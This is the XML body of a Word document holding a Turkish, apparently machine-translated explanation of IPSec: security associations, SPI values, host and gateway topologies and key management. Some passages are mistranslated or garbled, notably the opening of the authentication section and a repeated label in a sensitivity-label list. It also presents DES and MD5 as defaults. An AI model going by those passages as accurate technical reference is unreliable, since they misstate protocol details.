    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4"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 xml:space="preserve">IPSec gizlilik ve kimlik doğrulama hizmetleri birbirinden bağımsızdır. Bu, uygulamalarını basitleştirir ve ana bilgisayar sistemi üzerindeki performans etkilerini azaltır. Ayrıca, son kullanıcılara işlemleri için uygun güvenlik seviyesini seçme imkanı verir. Güvenlik işlevleri, şifreleme dönüşümlerinden bağımsızdır. Bu, temel şifrelemeyi değiştirmeden yeni şifreleme teknolojilerinin IPSec'e dahil edilmesine olanak tanır ve yere özgü kullanım ve ihracat kısıtlamalarıyla uyuşmazlığı önler. Ayrıca, son kullanıcıların kendi özel güvenlik gereksinimlerini en iyi şekilde karşılayan dönüşümleri gerçekleştirmesini mümkün kılar. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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Kullanıcılar düşük uygulama maliyetleri, minimum performans etkileri ve az sayıda uluslararası kullanım kısıtlaması olan karma şifreleme kullanarak kimlik doğrulama hizmetlerini seçebilirler. Bu uygulamalar geniş çapta dağıtılabilir ve günümüzdeki İnternet işlemlerinin çoğu için güvenlik konusunda önemli bir gelişme sağlar. Veya kullanıcılar, özel anahtar şifrelemesine dayalı gizlilik işlevlerini seçebilir. Bunların uygulanması daha zordur, daha yüksek performans etkilerine sahiptir ve çoğu zaman uluslararası kullanım kısıtlamalarına tabidir, bu nedenle çok daha yüksek bir güvenlik seviyesi sağlasalar da dağıtımları ve kullanımları genellikle sınırlıdır. Veya mümkün olan en yüksek güvenlik seviyesini sağlamak için bu fonksiyonları birleştirebilirler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527"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t>2.1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tek Yönlü Kurulum ile Ağ Katmanı (IP) Uygulaması</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Ağ katmanında güvenlik işlevinin tanıtılması, tüm istemci IP protokollerinin, bireysel özelleştirmeler olmadan güvenli bir şekilde çalışabileceği anlamına gelir. Dış Ağ Geçidi Protokolü (EGP) ve Sınır Ağ Geçidi Protokolü (BGP) gibi yönlendirme protokollerinin yanı sıra, TCP ve UDP gibi bağlantı ve bağlantısız taşıma protokolleri güvence altına alınabilir. Bu istemci protokollerini kullanan uygulamalar, IPSec güvenlik hizmetlerinden yararlanmak için hiçbir değişiklik gerektirmez. IPSec servislerinin eklenmesi, doğal güvenlik açıklarına (örneğin, açık metin şifresi) sahip uygulamaları, tek bir sistem değişikliği ile güvenli hale getirmeyi mümkün kılar. Ve bu değişiklik, IP hizmetleri ya da kullandıkları taşımalardan bağımsız olarak bu tür bir uygulamayı güvence altına alacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>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Bu özellik, hedef adresin belirlenemediği çok noktaya yayın ve tek noktaya yayın paketlerini kullanarak akış hizmetlerini bile genişletir. IPSec bunu, güvenli bağlantılar kurmak için tek yönlü bir başlatma şeması kullanarak mümkün kılar. Gönderen istasyon, bir ayar dizinini alıcı istasyona geçirir. Alıcı istasyon bu dizini, bağlantıyı yöneten güvenlik parametreleri tablosuna başvurmak için kullanır. Alıcı istasyonun güvenli tek yönlü bir bağlantı kurmak için gönderen istasyonla etkileşime girmesi gerekmez. İki yönlü bağlantılar için işlem tersine çevrilir. Alıcı istasyon gönderici olur ve kurulum dizinini göndericiye geri iletir. İstasyon gönderme ve alma, ana bilgisayarlar veya güvenlik ağ geçitleri olabilir.</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lastRenderedPageBreak/>
        <w:t>2.2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ana Bilgisayar ve Ağ Geçidi Topolojileri</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IPSec iki temel bağlantı topolojisini destekler: ana bilgisayardan ana bilgisayara ve ağ geçidinden ağ geçidine. Ana bilgisayar (bazen baştan sona denilen) topolojisinde, gönderme ve alma sistemleri, kendi aralarında veri iletmek için güvenli bağlantılar kuran iki veya daha fazla ana bilgisayardır. Ağ geçidi (alt ağdan alt ağa da denir) topolojisinde, gönderme ve alma sistemleri, kendi iç (güvenilir) alt ağlarına bağlı güvenilir ana bilgisayarlar adına dış (güvenilmeyen) sistemlerle bağlantı kuran güvenlik ağ geçitleridir. Güvenilir bir alt ağ çalışması, pasif veya aktif saldırılara girmemesi için birbirlerine güvenen bir veya daha fazla ana bilgisayar içeren bir iletişim kanalı (örneğin, Ethernet) olarak tanımlanır. Bir ağ geçidinden ağ geçidine bağlantı genellikle bir tünel veya sanal bir özel ağ (VPN) olarak adlandırılır. Üçüncü bir senaryo, ev sahibi ağ geçidine de mümkündür. Bu örnekte, güvenlik ağ geçidi, bir harici alt ağlarda harici ana bilgisayarlar ve güvenilir ana bilgisayarlar arasında bağlantı kurmak için kullanılır. Bu senaryo, Internet gibi güvenilmeyen ağlar aracılığıyla iç sistemlerdeki uygulamalara ve verilere erişmesi gereken seyahat eden çalışanlar veya telekomünikasyon cihazları için özellikle yararlıdır.</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Default="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Anahtar yönetimi</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Şifreleme anahtarlarını etkin bir şekilde yönetme ve dağıtma yeteneği, herhangi bir şifreleme sisteminin başarısı için çok önemlidir. IP Güvenlik Mimarisi, genel ve özel anahtar tabanlı sistemleri ve manuel veya otomatik anahtar dağıtımını destekleyen bir uygulama katmanı anahtar yönetimi şeması içerir. Aynı zamanda diğer prensip oturum parametrelerinin dağılımını da destekler. Bu işlevlerin standartlaştırılması, IPSec güvenlik işlevlerinin birden çok güvenlik alanında ve satıcı platformlarında kullanılmasını ve yönetilmesini mümkün kılar. IPSec Güvenlik Mimarisinin diğer iki önemli özelliği, Çok Düzeyli Güvenliği (MLS) olan sistemler ve tüm standart IPSec tipi kodlar için atanmış IANA (İnternet Atanmış Numaralar Otoritesi) kullanan sistemleri desteklemesidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AF0CDE" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF0CDE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>3.Uygulama ve Yapılar</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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IPSec Güvenlik Mimarisi iki IP başlık yapısı etrafında toplanmıştır: Kimlik Doğrulama Başlığı (AH) ve Kapsülleme Güvenlik Yükü (ESP) başlığı. Bu mekanizmaların nasıl işlediğini tam olarak anlamak için, güvenlik dernekleri kavramına bakmak gerekir. Algoritma bağımsızlığını elde etmek için, oturum parametrelerini belirlemek için esnek bir yöntem oluşturulmalıdır. Güvenlik dernekleri (SA) bu yöntem haline geldi</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t>3.1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Güvenlik Birlikleri (SA)</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Güvenlik birliği, bir veya daha fazla ağ bağlantısındaki güvenlik işlemlerini yöneten bir dizi güvenlik parametresinden oluşan bir tablo veya veritabanı kaydıdır. Güvenlik dernekleri yukarıda belirtilen tek yönlü başlatma planının bir parçasıdır. SA tabloları alıcı ana bilgisayara oluşturulur ve gönderen ana bilgisayar tarafından Güvenlik Parametreleri Dizini (SPI) olarak bilinen bir dizin parametresi kullanılarak referans alınır. Bir SA'daki en yaygın girişler:</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dönüşümün türü ve çalışma modu, örneğin blok zincirleme modunda DES. Bu gerekli bir parametredir. IPSec'in bağımsız olarak dönüştürülmek üzere tasarlandığını unutmayın, bu nedenle anlamlı bir veri alışverişi gerçekleşecekse, bu bilgiler uç noktalar arasında senkronize edilmelidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dönüşüm algoritması tarafından kullanılan anahtar veya anahtarlar. Bariz nedenlerden dolayı bu da zorunlu bir parametredir. Anahtarların kaynağı değişebilir. SAS ana bilgisayar veya ağ geçidi üzerine tanımlandığında manuel olarak girilebilirler. Anahtar dağıtım sistemi aracılığıyla tedarik edilebilirler veya - asimetrik şifreleme durumunda, ortak anahtar bağlantı kurulumu sırasında kablo üzerinden gönderilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Şifreleme algoritmasının senkronizasyon veya ilklendirme vektörü. Bazı şifreleme algoritmalarının, özellikle de zincirleme kullananların, şifreleme sırasını senkronize etmek için alıcı sisteme bir ilk veri bloğu sağlaması gerekebilir. Genellikle, şifreli verilerin ilk bloğu bu amaca hizmet eder, ancak bu parametre diğer uygulamalara izin verir. Bu parametre tüm ESP uygulamaları için gereklidir, ancak senkronizasyon gerekli değilse “yok” olarak tanımlanabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dönüştürme anahtarlarının ömrü. Parametre bir sürenin ifadesi veya bir anahtar değişikliğinin gerçekleşeceği belirli bir zaman olabilir. Kriptografik anahtarlar için önceden belirlenmiş bir kullanım ömrü yoktur. Anahtarların ne sıklıkta değiştiği sıklığı tamamen güvenlik noktalarının son noktalardaki takdirine bağlıdır. Bu nedenle, bu parametre yalnızca tavsiye edilir, gerekli değildir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Güvenlik birliğinin ömrü. Bir güvenlik birliği için önceden belirlenmiş bir yaşam süresi yoktur. Bir güvenlik birliğinin yürürlükte kaldığı süre, son nokta uygulayıcılarının takdirindedir. Bu nedenle, bu parametre de önerilir, ancak gerekli değildir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Güvenlik birliğinin kaynak adresi. Bir güvenlik birliği normalde sadece bir yönde kurulur. İki uç nokta arasındaki bir iletişim oturumu genellikle iki güvenlik birliğini içerecektir. Birden fazla gönderen ana bilgisayar bu güvenlik ilişkisini kullanırken, parametre bir joker değerine ayarlanabilir. Genellikle bu adres IP başlığındaki kaynak adresle aynıdır; bu nedenle, bu parametre önerilir, ancak gerekli değildir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Korunan verilerin hassasiyet seviyesi. Bu parametre, çok düzeyli güvenliği uygulayan ana bilgisayarlar için gereklidir ve diğer tüm sistemler için önerilir. Parametre, uç noktaların doğru yönlendirilmesini ve kullanılmasını sağlamak için güvenlik etiketleri (örneğin, Gizli, Gizli, Sınıflandırılmamış) ekleme yöntemi sağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="360"/>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 xml:space="preserve">Güvenlik ilişkileri normalde sadece bir yönde kurulur. Güvenli bir iletim kurulmadan önce, gönderme ve alma ana bilgisayarlarında SA'lar oluşturulmalıdır. Bu güvenlik ilişkileri anahtar yönetim protokolü aracılığıyla manuel veya otomatik olarak yapılandırılabilir. Bir (güvenli) alıcı ana bilgisayara yönelik bir datagram gönderilmeye hazır olduğunda, gönderme sistemi uygun güvenlik ilişkisini arar ve ortaya çıkan endeks değerini alıcı ana bilgisayara iletir. Alıcı ana sistemde ilgili SA'yı aramak için SPI ve hedef adresini kullanır. Çok seviyeli güvenlik durumunda, güvenlik etiketi de SA seçim sürecinin bir parçası haline gelir. Alıcı sistem daha sonra gönderen ana bilgisayardan sonraki tüm paketleri işlemek için bu SA parametrelerini kullanır. Tam kimliği doğrulanmış bir iletişim oturumu oluşturmak için, gönderme ve alıcı ana bilgisayarlar rolleri tersine çevirir ve ters yönde ikinci bir SA kurar. Bu tek yönlü SA seçim şemasının bir avantajı, trafo yayın türlerini desteklemesidir. Güvenlik </w:t>
      </w:r>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>dernekleri, yalnızca bu alıcı senaryosunda bile, alıcı ana bilgisayarın SPI'yi seçmesini sağlayarak kurulabilir. Tek noktaya yayın paketlerine tek bir SPI değeri atanabilir ve çok noktaya yayın paketlerine her çok noktaya yayın grubu için bir SPI atanabilir. Ancak, IPSec'in yayın trafiği için kullanımı bazı ciddi sınırlamalara sahiptir. Anahtar yönetimi ve dağıtımı çok zordur ve kriptografinin değeri azalır çünkü paketin kaynağı pozitif olarak kurulamaz.</w:t>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ab/>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ab/>
        <w:t>Güvenlik ilişkileri normalde sadece bir yönde kurulur. Güvenli bir iletim kurulmadan önce, gönderme ve alma ana bilgisayarlarında SA'lar oluşturulmalıdır. Bu güvenlik ilişkileri anahtar yönetim protokolü aracılığıyla manuel veya otomatik olarak yapılandırılabilir. Bir (güvenli) alıcı ana bilgisayara yönelik bir datagram gönderilmeye hazır olduğunda, gönderme sistemi uygun güvenlik ilişkisini arar ve ortaya çıkan endeks değerini alıcı ana bilgisayara iletir. Alıcı ana sistemde ilgili SA'yı aramak için SPI ve hedef adresini kullanır. Çok seviyeli güvenlik durumunda, güvenlik etiketi de SA seçim sürecinin bir parçası haline gelir. Alıcı sistem daha sonra gönderen ana bilgisayardan sonraki tüm paketleri işlemek için bu SA parametrelerini kullanır. Tam kimliği doğrulanmış bir iletişim oturumu oluşturmak için, gönderme ve alıcı ana bilgisayarlar rolleri tersine çevirir ve ters yönde ikinci bir SA kurar. Bu tek yönlü SA seçim şemasının bir avantajı, trafo yayın türlerini desteklemesidir. Güvenlik dernekleri, yalnızca bu alıcı senaryosunda bile, alıcı ana bilgisayarın SPI'yi seçmesini sağlayarak kurulabilir. Tek noktaya yayın paketlerine tek bir SPI değeri atanabilir ve çok noktaya yayın paketlerine her çok noktaya yayın grubu için bir SPI atanabilir. Ancak, IPSec'in yayın trafiği için kullanımı bazı ciddi sınırlamalara sahiptir. Anahtar yönetimi ve dağıtımı çok zordur ve kriptografinin değeri azalır çünkü paketin kaynağı pozitif olarak kurulamaz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527"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t>3.2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Güvenlik Parametreleri Endeksi (SPI)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>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Güvenlik Parametreleri Dizini, bir güvenlik ilişkisini (SA) benzersiz şekilde tanımlamak için kullanılan 32 bit sözde rasgele bir sayıdır. Bir SPI'nin kaynağı değişebilir. SA ana bilgisayar veya ağ geçidi üzerine tanımlandığında manuel olarak girilebilir veya bir SA dağıtım sistemi aracılığıyla sağlanabilir. Açıkçası, güvenlik fonksiyonunun düzgün çalışması için, SPI'ların bitiş noktaları arasında senkronize edilmesi gerekir. 1 ile 255 arasındaki SPI değerleri, açıkça belirtilmiş (diğer bir deyişle standart) uygulamalarda kullanılmak üzere IANA tarafından ayrılmıştır. SPI'ler minimum yönetim gerektirir ancak önceden atanmış SPI'lerin ilişkili SA'ları silindikten sonra çok hızlı bir şekilde tekrar kullanılmamasını sağlamak için bazı önlemler alınmalıdır. SPI değeri sıfır (0), bu işlem için bir güvenlik ilişkisinin bulunmadığını belirtir. Ana bilgisayardan ana bilgisayara bağlantılarda, SPI alıcı ana bilgisayar tarafından güvenlik ilişkisini aramak için kullanılır. Bir ağ geçidinden ağ geçidine, tek noktaya yayın veya çok noktaya yayın işleminde alıcı sistem, uygun SA'yı belirlemek için SPI'yı hedef adresle (ve bir MLS sisteminde, güvenlik etiketiyle) birleştirir. Şimdi, IPSec kimlik doğrulama ve gizlilik işlevlerinin SA ve SPI'leri nasıl kullandığına bakacağız.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4"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t>3.3.Kimlik Doğrulama F</w:t>
      </w:r>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>onksiyonu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A21E8B"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 xml:space="preserve">IPSec kimlik doğrulaması (IPSec). Varsayılan algoritma, yeniden değerlendirme yapılmayan Message Digest sürüm 5 (MD5) olarak anahtarlanmıştır. Reddedilmeme </w:t>
      </w:r>
      <w:r w:rsidRPr="00A21E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>için kullanılabilir. IPSec kimlik doğrulama fonksiyonu, gizlilik veya trafik fonksiyonu c analiz koruması sağlamaz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A21E8B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
